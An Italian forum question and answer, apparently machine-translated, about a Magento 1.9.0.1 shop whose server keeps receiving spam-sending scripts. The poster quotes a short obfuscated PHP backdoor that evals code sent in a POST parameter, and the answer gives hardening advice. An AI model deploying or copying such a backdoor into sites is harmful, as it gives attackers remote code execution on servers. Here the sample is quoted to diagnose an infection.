"Pulire" magento installazione 1.9.0.1 (Patch installate) Script spam installati?
-
29-09-2020 - |
Domanda
Ho un paio di webshop magenti.E solo un webshop magento senza estensioni e con tutte le patch installate ha il problema che installa alcuni script che inviano spam.
Alcuni fatti:
- .
- magento 1.9.0.1
- Nessuna estensione
- Tema verificato che ottiene aggiornamenti regolari
- Tema infantile utilizzato per le proprie personalizzazioni (solo CSS e Simple HTML)
- Patch tutto installato quando necessario
È installato su un VPS su Centos.PHP-FPM 5.3 (5.6 come secondo PHP) Exim + mailgun utilizzato per l'invio di posta.
Un campione di ciò che è installato:
<?php
$ugjr9="utrsoe_p";
$kzbf99 =$ugjr9[3]. $ugjr9[1]. $ugjr9[2]. $ugjr9[1]. $ugjr9[4]. $ugjr9[0]. $ugjr9[7]. $ugjr9[7]. $ugjr9[5]. $ugjr9[2];
$dmr4 = $kzbf99($ugjr9[6]. $ugjr9[7] . $ugjr9[4]. $ugjr9[3]. $ugjr9[1] );
if( isset (${$dmr4 }['qa04af1'])) {eval( ${ $dmr4 }['qa04af1' ]) ; }
?>
.
Aiuto Aiuto
Soluzione
Se possibile, prova a identificare la causa principale del problema (con cui il malware sei infetto. È noto magento?).
Consiglierei di verificare che tutti i tuoi file core nell'installazione Magento siano stati modificati o verificare o controllare qualsiasi script nel server che potrebbe causare il problema.
https://blog.amasty. COM / FREEBIE-MAGENTO-Modified-Core-Files-Report-by-Amasty /
Poiché non si utilizza alcuna estensione è possibile sostituire tutti i file core con una nuova installazione per essere sicuri.
Dai un'occhiata ai seguenti suggerimenti.
..
- Crea un percorso di amministratore personalizzato
- Scegli un nome utente e una password di amministratore lungo e complessa ( https://strongpasswordgenerator.com/ ) Non usare mai la tua password di amministrazione magenta per qualsiasi altra cosa
- Utilizzare sempre FTP sicuro
- Limita l'accesso FTP non garantito per prevenire cattivi script da distruggere il cavo
- Cambia i tuoi autorizzazioni del file
- Lockdown Your Magento Connect Manager